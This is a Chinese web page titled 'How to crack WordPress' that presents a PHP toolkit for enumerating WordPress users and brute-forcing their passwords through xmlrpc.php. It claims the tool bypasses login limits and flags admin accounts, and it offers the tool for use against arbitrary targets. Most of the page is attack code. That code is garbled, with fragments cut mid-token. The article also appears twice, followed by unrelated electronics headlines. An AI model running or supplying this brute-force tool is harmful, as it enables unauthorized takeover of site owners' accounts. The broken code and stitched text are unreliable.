如何破解wordpress
web破解 一般喜欢用 burpsuite 、hydra 通用性好 但 一大堆参数 使用是还需配置
破解wordpress 用wpscan 不得不说是很好用 功能多 而且经常更新但 不是每次跑wordpress 都开linux (ruby 各种蛋疼)
1: 使用非常简单 无需其它参数
shell>php scan.php http://www.target.com
2:多线程(异步) 同时进行
破完一个用户成功立即退出该任务 接着破另外一个用户
3:自动生成用户名相关并加到字典头部
大大的提高破解速度
4:模块可单独使用
5:枚举用户模块 能抓取大部分常规 wordpress站点用户
检查枚举到的用户是否为登陆用户 如果不是则剔除 大大的提高破解效率
6:该脚本 需curl 扩展支持
7:利用wordpress 的xmlrpc.php 文件破解
可绕过限制 并判断是否为管理员用户
8、环境简单
仅需 php.exe 、php5ts.dll 、curl.dll
文件说明:
init.php 配置及功能函数enum_user.php 根据页面枚举用户chkuser.php 检测枚举到的用户是否为可登陆用户rollingcurl.php 多线程http请求类 (修改版)brutewordpress.php 爆破类scan.php 主文件(要运行的文件)pass.list 高频率弱口令
init.php
enum_user.php
nv = 0;$this->rc = new rollingcurl();$this->rc->callback = $this->create_request_callback($this->rc);$this->rc->__set('window_size', thread);$this->rc->__set('time_out', timeout); }function create_request_callback($rc) {return function ($response, $info, $request) use ($rc) { $pattern = '/(author/(.*)/feed|names[] = $name[$c]; } else {$this->nv++; } }if ($this->nv >= 3) {$this->rc->cancelrequests(); } }; }function run() {global $a; printf([+] %s enumerating usernames ..., date('hs', time()));for ($i = 1; $i options = array(curlopt_useragent => useragent);$this->rc->add($request); }$this->rc->execute();if (count($this->names) == 0) {exit('[-] unable to find user!'); }echo [+] find . count($this->names) . ' users' . php_eol; }function result() {return $this->names; }}?>
chkuser.php
rc = new rollingcurl();$this->rc->callback = $this->create_request_callback($this->rc);$this->rc->__set('window_size', thread);$this->rc->__set('time_out', timeout); }function create_request_callback($rc) {return function ($response, $info, $request) use ($rc) {if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) {echo '[-] access error!' . php_eol;$this->rc->cancelrequests(); } preg_match('#log=(.+)&pwd=#', $request->post_data, $out); $user = $out[1];if (stristr($response, . $user . )) {$this->names[] = $user; }if (stristr($response, 'too many failed login attempts')) {$this->rc->cancelrequests(); } }; }function run() {include_once 'enum_user.php'; $collector = new enumuser(); $collector->run(); $users = $collector->result(); printf([+] %s chkusers loginname..., date('hs', time()));foreach ($users as $user) { $url = domain . '/wp-login.php'; $post_data = log={$user}&pwd=ujp8xnfd4n3lzijlax; $request = new rollingcurlrequest($url, 'post', $post_data); $request->options = array(curlopt_useragent => useragent);$this->rc->add($request); }$this->rc->execute(); $counts = count($this->names);if ($counts == 0) {echo '[-] warning unable check loginuser!' . php_eol;$this->names = $users; $counts = count($this->names); }echo 'login users:' . php_eol;foreach ($this->names as $key => $u) {echo .iconv(utf-8,gb18030//ignore,$u) . php_eol; } printf([+] %s finded %d loginnames ... , date('hs', time()), $counts); }function result() {return $this->names; }}?>
rollingcurl.php
url = $url;$this->method = $method;$this->post_data = $post_data;$this->headers = $headers;$this->options = $options; }/** * @return void */public function __destruct() {unset($this->url, $this->method, $this->post_data, $this->headers, $this->options); }}/** * rollingcurl custom exception */class rollingcurlexception extends exception{}/** * class that holds a rolling queue of curl requests. * * @throws rollingcurlexception */class rollingcurl{/** * @var int * * window size is the max number of simultaneous connections allowed. * * remember to respect the servers: * sending too many requests at one time can easily be perceived * as a dos attack. increase this window_size if you are making requests * to multiple servers or have permission from the receving server admins. */private $window_size = 5;/** * @var float * * timeout is the timeout used for curl_multi_select. */private $timeout = 10;/** * @var string|array * * callback function to be applied to each result. */public $callback;public $master = null;public $requestlist = array();/** * @var array * * set your base options that you want to be used with every request. */protected $options = array(curlopt_ssl_verifypeer => 0, curlopt_returntransfer => 1, curlopt_connecttimeout => 30, curlopt_timeout => 30);/** * @var array */private $headers = array();/** * @var request[] * * the request queue */private $requests = array();/** * @var requestmap[] * * maps handles to request indexes */private $requestmap = array();/** * @param $callback * callback function to be applied to each result. * * can be specified as 'my_callback_function' * or array($object, 'my_callback_method'). * * function should take three parameters: $response, $info, $request. * $response is response body, $info is additional curl info. * $request is the original request * * @return void */function __construct($callback = null) {$this->callback = $callback; }/** * @param string $name * @return mixed */public function __get($name) {return (isset($this->{$name})) ? $this->{$name} : null; }/** * @param string $name * @param mixed $value * @return bool */public function __set($name, $value) {// append the base options & headersif ($name == options || $name == headers) {$this->{$name} = $value + $this->{$name}; } else {$this->{$name} = $value; }return true; }/** * add a request to the request queue * * @param request $request * @return bool */public function add($request) {$this->requests[] = $request;return true; }public function cancelrequests($all = true) {$this->requests = array();if ($all) {foreach ($this->requestlist as $handler) { curl_multi_remove_handle($this->master, $handler); } }return true; }/** * create new request and add it to the request queue * * @param string $url * @param string $method * @param $post_data * @param $headers * @param $options * @return bool */public function request($url, $method = get, $post_data = null, $headers = null, $options = null) {$this->requests[] = new rollingcurlrequest($url, $method, $post_data, $headers, $options);return true; }/** * perform get request * * @param string $url * @param $headers * @param $options * @return bool */public function get($url, $headers = null, $options = null) {return $this->request($url, get, null, $headers, $options); }/** * perform post request * * @param string $url * @param $post_data * @param $headers * @param $options * @return bool */public function post($url, $post_data = null, $headers = null, $options = null) {return $this->request($url, post, $post_data, $headers, $options); }/** * execute processing * * @param int $window_size max number of simultaneous connections * @return string|bool */public function execute($window_size = null) {// rolling curl window must always be greater than 1if (sizeof($this->requests) == 1) {return $this->single_curl(); } else {// start the rolling curl. window_size is the max number of simultaneous connectionsreturn $this->rolling_curl($window_size); } }/** * performs a single curl request * * @access private * @return string */private function single_curl() { $ch = curl_init(); $request = array_shift($this->requests); $options = $this->get_options($request); curl_setopt_array($ch, $options); $output = curl_exec($ch); $info = curl_getinfo($ch);// it's not neccesary to set a callback for one-off requestsif ($this->callback) { $callback = $this->callback;if (is_callable($this->callback)) { call_user_func($callback, $output, $info, $request); } } else return $output;return true; }/** * performs multiple curl requests * * @access private * @throws rollingcurlexception * @param int $window_size max number of simultaneous connections * @return bool */private function rolling_curl($window_size = null) {if ($window_size) $this->window_size = $window_size;// make sure the rolling window isn't greater than the # of urlsif (sizeof($this->requests) window_size) $this->window_size = sizeof($this->requests);if ($this->window_size master = curl_multi_init();// start the first batch of requestsfor ($i = 0; $i window_size; $i++) { $ch = curl_init(); $options = $this->get_options($this->requests[$i]); curl_setopt_array($ch, $options); curl_multi_add_handle($this->master, $ch); array_push($this->requestlist, $ch);// add to our request maps $key = (string)$ch;$this->requestmap[$key] = $i; }do {while (($execrun = curl_multi_exec($this->master, $running)) == curlm_call_multi_perform);if ($execrun != curlm_ok) break;// a request was just completed -- find out which onewhile ($done = curl_multi_info_read($this->master)) {// get the info and content returned on the request $info = curl_getinfo($done['handle']); $output = curl_multi_getcontent($done['handle']);// send the return values to the callback function. $callback = $this->callback;if (is_callable($callback)) { $key = (string)$done['handle']; $request = $this->requests[$this->requestmap[$key]];unset($this->requestmap[$key]); call_user_func($callback, $output, $info, $request); }// start a new request (it's important to do this before removing the old one)if ($i requests) && isset($this->requests[$i]) && $i requests)) { $ch = curl_init(); $options = $this->get_options($this->requests[$i]); curl_setopt_array($ch, $options); curl_multi_add_handle($this->master, $ch); array_push($this->requestlist, $ch);// add to our request maps $key = (string)$ch;$this->requestmap[$key] = $i; $i++; }// remove the curl handle that just completed curl_multi_remove_handle($this->master, $done['handle']); }// block for data in / output; error handling is done by curl_multi_execif ($running) curl_multi_select($this->master, $this->timeout); }while ($running); curl_multi_close($this->master);return true; }/** * helper function to set up a new request by setting the appropriate options * * @access private * @param request $request * @return array */private function get_options($request) {// options for this entire curl object $options = $this->__get('options');if (ini_get('safe_mode') == 'off' || !ini_get('safe_mode')) { $options[curlopt_followlocation] = 1; $options[curlopt_maxredirs] = 5; } $headers = $this->__get('headers');// append custom options for this specific requestif ($request->options) { $options = $request->options + $options; }// set the request url $options[curlopt_url] = $request->url;// posting data w/ this request?if ($request->post_data) { $options[curlopt_post] = 1; $options[curlopt_postfields] = $request->post_data; }if ($headers) { $options[curlopt_header] = 0; $options[curlopt_httpheader] = $headers; }return $options; }/** * @return void */public function __destruct() {unset($this->window_size, $this->callback, $this->options, $this->headers, $this->requests); }}
brutewordpress.php
rc = new rollingcurl();$this->rc->callback = $this->create_request_callback($this->rc);$this->rc->__set('window_size', thread);$this->rc->__set('time_out', timeout); }function create_request_callback($rc) {return function ($response, $info, $request) use ($rc) {if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) {echo '[-] access error!' . php_eol;$this->rc->cancelrequests(); } $p = $request->post_data; preg_match_all('/([^s]+?)/', $p, $m); $user = $m[1][0]; $pass = $m[1][1];if (!preg_match('/(d)/', $response, $is_admin)) {//echo '[*] brote user ' . $user . ... . ; } else {//print_r($is_admin).php_eol;if ($is_admin[1] == 1) {echo '[+] bruteed~ -> ' . iconv(utf-8,gb18030//ignore,$user) . ':' . $pass . ' [is admin]' . php_eol;$this->rc->cancelrequests(); } else {echo '[+] bruteed~ -> ' . iconv(utf-8,gb18030//ignore,$user) . ':' . $pass . php_eol;$this->rc->cancelrequests(); } } }; }function run() { $pass_file = preg_replace('/s$/', , file(wordlist)); $user_pre = array('123', '111', '1', 'a', 'pass', '!@#', 'password', 'abc', '1961', '1962', '1963', '1970', '1988', '1989', '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2001', '2002', '2003', '2004', '2006', '2005', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015');foreach ($user_pre as $pre) { $pre_u[] = user . $pre; } $p = array_merge($pre_u, $pass_file); $passwords = array_unique($p); array_unshift($passwords, user);foreach ($passwords as $pass) { $url = domain . '/xmlrpc.php'; $post_data = sprintf('wp.getusersblogs%s%s', user, $pass); $request = new rollingcurlrequest($url, 'post', $post_data); $request->options = array(curlopt_useragent => useragent);$this->rc->add($request); }$this->rc->execute(); }}$brute = new brutewordpress();$brute->run();?>
scan.php
run();$user_arr = $chk->result();//print_r($user_arr);function broter($user) { system('php brutewordpress.php ' . target . ' ' . $user);}printf([+] %s broting..., date('hs', time()));foreach ($user_arr as $user) {echo '[*] brute user ' . iconv(utf-8,gb18030//ignore,$user). ... . str_repeat(' ', 60) . ; broter($user);}show_time();?>
无人机辅助管道巡检渐成常态,管道巡检无人机应用优势
Imagination宣布将在明年发布IMG C系列,将加入光线追踪的支持
自然语言处理(NLP)知识结构总结
基于Android P的华为EMUI 9.0系统正式发布
多路输出DC/DC变换器的分类_DC/DC变换器的多路输出技术电路图
如何破解wordpress
618不容错过的好物:讯飞双屏翻译机外观精致实力更非凡
探讨厨电行业当前形势以及后市的走势
AI技术加速应用会带来怎样的机遇
什么是3D成像_3D成像应用
AI脑芯片可以解决自闭症和精神分裂症的治疗难题
开关电源初级和次级加上两个电容有什么作用呢?
雷曼光电发布MR系列COB租赁产品
rs232,rs422,rs485的区别 串口通讯怎么加握手
Firefly-RK3128开发板UART接口介绍
电源故障之空载电压不正常、频率过高等问题,试试这些方法→
浅析BUCK芯片在电路中的应用及特点
【虹科终端安全案例】Radwell如何有效防止无文件攻击和内存中的威胁?
语音报血压、报警电路
[图文]水面高度报警器电路图
破解wordpress 用wpscan 不得不说是很好用 功能多 而且经常更新但 不是每次跑wordpress 都开linux (ruby 各种蛋疼)
1: 使用非常简单 无需其它参数
shell>php scan.php http://www.target.com
2:多线程(异步) 同时进行
破完一个用户成功立即退出该任务 接着破另外一个用户
3:自动生成用户名相关并加到字典头部
大大的提高破解速度
4:模块可单独使用
5:枚举用户模块 能抓取大部分常规 wordpress站点用户
检查枚举到的用户是否为登陆用户 如果不是则剔除 大大的提高破解效率
6:该脚本 需curl 扩展支持
7:利用wordpress 的xmlrpc.php 文件破解
可绕过限制 并判断是否为管理员用户
8、环境简单
仅需 php.exe 、php5ts.dll 、curl.dll
文件说明:
init.php 配置及功能函数enum_user.php 根据页面枚举用户chkuser.php 检测枚举到的用户是否为可登陆用户rollingcurl.php 多线程http请求类 (修改版)brutewordpress.php 爆破类scan.php 主文件(要运行的文件)pass.list 高频率弱口令
init.php
enum_user.php
nv = 0;$this->rc = new rollingcurl();$this->rc->callback = $this->create_request_callback($this->rc);$this->rc->__set('window_size', thread);$this->rc->__set('time_out', timeout); }function create_request_callback($rc) {return function ($response, $info, $request) use ($rc) { $pattern = '/(author/(.*)/feed|names[] = $name[$c]; } else {$this->nv++; } }if ($this->nv >= 3) {$this->rc->cancelrequests(); } }; }function run() {global $a; printf([+] %s enumerating usernames ..., date('hs', time()));for ($i = 1; $i options = array(curlopt_useragent => useragent);$this->rc->add($request); }$this->rc->execute();if (count($this->names) == 0) {exit('[-] unable to find user!'); }echo [+] find . count($this->names) . ' users' . php_eol; }function result() {return $this->names; }}?>
chkuser.php
rc = new rollingcurl();$this->rc->callback = $this->create_request_callback($this->rc);$this->rc->__set('window_size', thread);$this->rc->__set('time_out', timeout); }function create_request_callback($rc) {return function ($response, $info, $request) use ($rc) {if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) {echo '[-] access error!' . php_eol;$this->rc->cancelrequests(); } preg_match('#log=(.+)&pwd=#', $request->post_data, $out); $user = $out[1];if (stristr($response, . $user . )) {$this->names[] = $user; }if (stristr($response, 'too many failed login attempts')) {$this->rc->cancelrequests(); } }; }function run() {include_once 'enum_user.php'; $collector = new enumuser(); $collector->run(); $users = $collector->result(); printf([+] %s chkusers loginname..., date('hs', time()));foreach ($users as $user) { $url = domain . '/wp-login.php'; $post_data = log={$user}&pwd=ujp8xnfd4n3lzijlax; $request = new rollingcurlrequest($url, 'post', $post_data); $request->options = array(curlopt_useragent => useragent);$this->rc->add($request); }$this->rc->execute(); $counts = count($this->names);if ($counts == 0) {echo '[-] warning unable check loginuser!' . php_eol;$this->names = $users; $counts = count($this->names); }echo 'login users:' . php_eol;foreach ($this->names as $key => $u) {echo .iconv(utf-8,gb18030//ignore,$u) . php_eol; } printf([+] %s finded %d loginnames ... , date('hs', time()), $counts); }function result() {return $this->names; }}?>
rollingcurl.php
url = $url;$this->method = $method;$this->post_data = $post_data;$this->headers = $headers;$this->options = $options; }/** * @return void */public function __destruct() {unset($this->url, $this->method, $this->post_data, $this->headers, $this->options); }}/** * rollingcurl custom exception */class rollingcurlexception extends exception{}/** * class that holds a rolling queue of curl requests. * * @throws rollingcurlexception */class rollingcurl{/** * @var int * * window size is the max number of simultaneous connections allowed. * * remember to respect the servers: * sending too many requests at one time can easily be perceived * as a dos attack. increase this window_size if you are making requests * to multiple servers or have permission from the receving server admins. */private $window_size = 5;/** * @var float * * timeout is the timeout used for curl_multi_select. */private $timeout = 10;/** * @var string|array * * callback function to be applied to each result. */public $callback;public $master = null;public $requestlist = array();/** * @var array * * set your base options that you want to be used with every request. */protected $options = array(curlopt_ssl_verifypeer => 0, curlopt_returntransfer => 1, curlopt_connecttimeout => 30, curlopt_timeout => 30);/** * @var array */private $headers = array();/** * @var request[] * * the request queue */private $requests = array();/** * @var requestmap[] * * maps handles to request indexes */private $requestmap = array();/** * @param $callback * callback function to be applied to each result. * * can be specified as 'my_callback_function' * or array($object, 'my_callback_method'). * * function should take three parameters: $response, $info, $request. * $response is response body, $info is additional curl info. * $request is the original request * * @return void */function __construct($callback = null) {$this->callback = $callback; }/** * @param string $name * @return mixed */public function __get($name) {return (isset($this->{$name})) ? $this->{$name} : null; }/** * @param string $name * @param mixed $value * @return bool */public function __set($name, $value) {// append the base options & headersif ($name == options || $name == headers) {$this->{$name} = $value + $this->{$name}; } else {$this->{$name} = $value; }return true; }/** * add a request to the request queue * * @param request $request * @return bool */public function add($request) {$this->requests[] = $request;return true; }public function cancelrequests($all = true) {$this->requests = array();if ($all) {foreach ($this->requestlist as $handler) { curl_multi_remove_handle($this->master, $handler); } }return true; }/** * create new request and add it to the request queue * * @param string $url * @param string $method * @param $post_data * @param $headers * @param $options * @return bool */public function request($url, $method = get, $post_data = null, $headers = null, $options = null) {$this->requests[] = new rollingcurlrequest($url, $method, $post_data, $headers, $options);return true; }/** * perform get request * * @param string $url * @param $headers * @param $options * @return bool */public function get($url, $headers = null, $options = null) {return $this->request($url, get, null, $headers, $options); }/** * perform post request * * @param string $url * @param $post_data * @param $headers * @param $options * @return bool */public function post($url, $post_data = null, $headers = null, $options = null) {return $this->request($url, post, $post_data, $headers, $options); }/** * execute processing * * @param int $window_size max number of simultaneous connections * @return string|bool */public function execute($window_size = null) {// rolling curl window must always be greater than 1if (sizeof($this->requests) == 1) {return $this->single_curl(); } else {// start the rolling curl. window_size is the max number of simultaneous connectionsreturn $this->rolling_curl($window_size); } }/** * performs a single curl request * * @access private * @return string */private function single_curl() { $ch = curl_init(); $request = array_shift($this->requests); $options = $this->get_options($request); curl_setopt_array($ch, $options); $output = curl_exec($ch); $info = curl_getinfo($ch);// it's not neccesary to set a callback for one-off requestsif ($this->callback) { $callback = $this->callback;if (is_callable($this->callback)) { call_user_func($callback, $output, $info, $request); } } else return $output;return true; }/** * performs multiple curl requests * * @access private * @throws rollingcurlexception * @param int $window_size max number of simultaneous connections * @return bool */private function rolling_curl($window_size = null) {if ($window_size) $this->window_size = $window_size;// make sure the rolling window isn't greater than the # of urlsif (sizeof($this->requests) window_size) $this->window_size = sizeof($this->requests);if ($this->window_size master = curl_multi_init();// start the first batch of requestsfor ($i = 0; $i window_size; $i++) { $ch = curl_init(); $options = $this->get_options($this->requests[$i]); curl_setopt_array($ch, $options); curl_multi_add_handle($this->master, $ch); array_push($this->requestlist, $ch);// add to our request maps $key = (string)$ch;$this->requestmap[$key] = $i; }do {while (($execrun = curl_multi_exec($this->master, $running)) == curlm_call_multi_perform);if ($execrun != curlm_ok) break;// a request was just completed -- find out which onewhile ($done = curl_multi_info_read($this->master)) {// get the info and content returned on the request $info = curl_getinfo($done['handle']); $output = curl_multi_getcontent($done['handle']);// send the return values to the callback function. $callback = $this->callback;if (is_callable($callback)) { $key = (string)$done['handle']; $request = $this->requests[$this->requestmap[$key]];unset($this->requestmap[$key]); call_user_func($callback, $output, $info, $request); }// start a new request (it's important to do this before removing the old one)if ($i requests) && isset($this->requests[$i]) && $i requests)) { $ch = curl_init(); $options = $this->get_options($this->requests[$i]); curl_setopt_array($ch, $options); curl_multi_add_handle($this->master, $ch); array_push($this->requestlist, $ch);// add to our request maps $key = (string)$ch;$this->requestmap[$key] = $i; $i++; }// remove the curl handle that just completed curl_multi_remove_handle($this->master, $done['handle']); }// block for data in / output; error handling is done by curl_multi_execif ($running) curl_multi_select($this->master, $this->timeout); }while ($running); curl_multi_close($this->master);return true; }/** * helper function to set up a new request by setting the appropriate options * * @access private * @param request $request * @return array */private function get_options($request) {// options for this entire curl object $options = $this->__get('options');if (ini_get('safe_mode') == 'off' || !ini_get('safe_mode')) { $options[curlopt_followlocation] = 1; $options[curlopt_maxredirs] = 5; } $headers = $this->__get('headers');// append custom options for this specific requestif ($request->options) { $options = $request->options + $options; }// set the request url $options[curlopt_url] = $request->url;// posting data w/ this request?if ($request->post_data) { $options[curlopt_post] = 1; $options[curlopt_postfields] = $request->post_data; }if ($headers) { $options[curlopt_header] = 0; $options[curlopt_httpheader] = $headers; }return $options; }/** * @return void */public function __destruct() {unset($this->window_size, $this->callback, $this->options, $this->headers, $this->requests); }}
brutewordpress.php
rc = new rollingcurl();$this->rc->callback = $this->create_request_callback($this->rc);$this->rc->__set('window_size', thread);$this->rc->__set('time_out', timeout); }function create_request_callback($rc) {return function ($response, $info, $request) use ($rc) {if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) {echo '[-] access error!' . php_eol;$this->rc->cancelrequests(); } $p = $request->post_data; preg_match_all('/([^s]+?)/', $p, $m); $user = $m[1][0]; $pass = $m[1][1];if (!preg_match('/(d)/', $response, $is_admin)) {//echo '[*] brote user ' . $user . ... . ; } else {//print_r($is_admin).php_eol;if ($is_admin[1] == 1) {echo '[+] bruteed~ -> ' . iconv(utf-8,gb18030//ignore,$user) . ':' . $pass . ' [is admin]' . php_eol;$this->rc->cancelrequests(); } else {echo '[+] bruteed~ -> ' . iconv(utf-8,gb18030//ignore,$user) . ':' . $pass . php_eol;$this->rc->cancelrequests(); } } }; }function run() { $pass_file = preg_replace('/s$/', , file(wordlist)); $user_pre = array('123', '111', '1', 'a', 'pass', '!@#', 'password', 'abc', '1961', '1962', '1963', '1970', '1988', '1989', '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2001', '2002', '2003', '2004', '2006', '2005', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015');foreach ($user_pre as $pre) { $pre_u[] = user . $pre; } $p = array_merge($pre_u, $pass_file); $passwords = array_unique($p); array_unshift($passwords, user);foreach ($passwords as $pass) { $url = domain . '/xmlrpc.php'; $post_data = sprintf('wp.getusersblogs%s%s', user, $pass); $request = new rollingcurlrequest($url, 'post', $post_data); $request->options = array(curlopt_useragent => useragent);$this->rc->add($request); }$this->rc->execute(); }}$brute = new brutewordpress();$brute->run();?>
scan.php
run();$user_arr = $chk->result();//print_r($user_arr);function broter($user) { system('php brutewordpress.php ' . target . ' ' . $user);}printf([+] %s broting..., date('hs', time()));foreach ($user_arr as $user) {echo '[*] brute user ' . iconv(utf-8,gb18030//ignore,$user). ... . str_repeat(' ', 60) . ; broter($user);}show_time();?>
无人机辅助管道巡检渐成常态,管道巡检无人机应用优势
Imagination宣布将在明年发布IMG C系列,将加入光线追踪的支持
自然语言处理(NLP)知识结构总结
基于Android P的华为EMUI 9.0系统正式发布
多路输出DC/DC变换器的分类_DC/DC变换器的多路输出技术电路图
如何破解wordpress
618不容错过的好物:讯飞双屏翻译机外观精致实力更非凡
探讨厨电行业当前形势以及后市的走势
AI技术加速应用会带来怎样的机遇
什么是3D成像_3D成像应用
AI脑芯片可以解决自闭症和精神分裂症的治疗难题
开关电源初级和次级加上两个电容有什么作用呢?
雷曼光电发布MR系列COB租赁产品
rs232,rs422,rs485的区别 串口通讯怎么加握手
Firefly-RK3128开发板UART接口介绍
电源故障之空载电压不正常、频率过高等问题,试试这些方法→
浅析BUCK芯片在电路中的应用及特点
【虹科终端安全案例】Radwell如何有效防止无文件攻击和内存中的威胁?
语音报血压、报警电路
[图文]水面高度报警器电路图